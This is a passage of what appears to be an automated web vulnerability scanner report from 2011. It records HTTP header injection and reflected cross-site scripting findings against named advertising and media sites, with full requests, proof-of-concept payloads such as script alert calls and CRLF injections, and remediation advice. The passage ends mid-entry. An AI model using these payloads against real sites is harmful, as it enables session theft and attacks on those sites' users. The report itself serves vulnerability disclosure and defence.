HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/62530 230925b8b8/N3340.scanscout.com/B4852812.30: Date: Thu, 03 Feb 2011 22:03:15 GMT Server: GFE/2.0 Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 333cd%0d%0a3e381d53e01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /333cd%0d%0a3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784? Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 87fe3%0d%0a9a9fc1f6091 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /87fe3%0d%0a9a9fc1f6091/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/87fe3 9a9fc1f6091/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D628759578: Date: Fri, 04 Feb 2011 17:55:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 9db3a%0d%0aa4d4062d9d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9db3a%0d%0aa4d4062d9d8/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9db3a a4d4062d9d8/lb.buzzillions/%3Bnet%3Dlb%3Bu%3D%2Clb-5843489_1296770394%2C11d765b6a10b1b3%2Cnone%2Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bcontx%3Dnone%3Bdc%3Dw%3Bbtg%3Dan.: Date: Fri, 04 Feb 2011 01:50:01 GMT Server: GFE/2.0
The value of REST URL parameter 2 is copied into the Location response header. The payload cdbde%0d%0ad36a9dd2cc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into an HTML comment. The payload bf5ec--><script>alert(1)</script>db1ccd44039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039 HTTP/1.1 Host: abc.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 Content-Length: 4911 Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b6987<script>alert(1)</script>1178017b98e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacons?callback=jsonp1296766389465b6987<script>alert(1)</script>1178017b98e HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 6f421%0aalert(1)//3a48dc45b10 was submitted in the url parameter. This input was echoed as 6f421 alert(1)//3a48dc45b10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml6f421%0aalert(1)//3a48dc45b10&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91 HTTP/1.1 Host: ads.gmodules.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020952&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787019866&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=11&xpc=WZvbsEpZ0D&p=http%3A//www.bizfind.us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml6f421 alert(1)//3a48dc45b10. HTTP error 400
3.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://advertise.tucows.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f20"-alert(1)-"c17f4a73141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?41f20"-alert(1)-"c17f4a73141=1 HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:33 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84492
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a76"-alert(1)-"4bef7d4836e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:21 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9378"-alert(1)-"68cf811d6fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d63"-alert(1)-"f61e34bb76a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:45 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32415
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8543"-alert(1)-"e7c1cf5b326 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:55 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471ee"-alert(1)-"f64e6d809a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
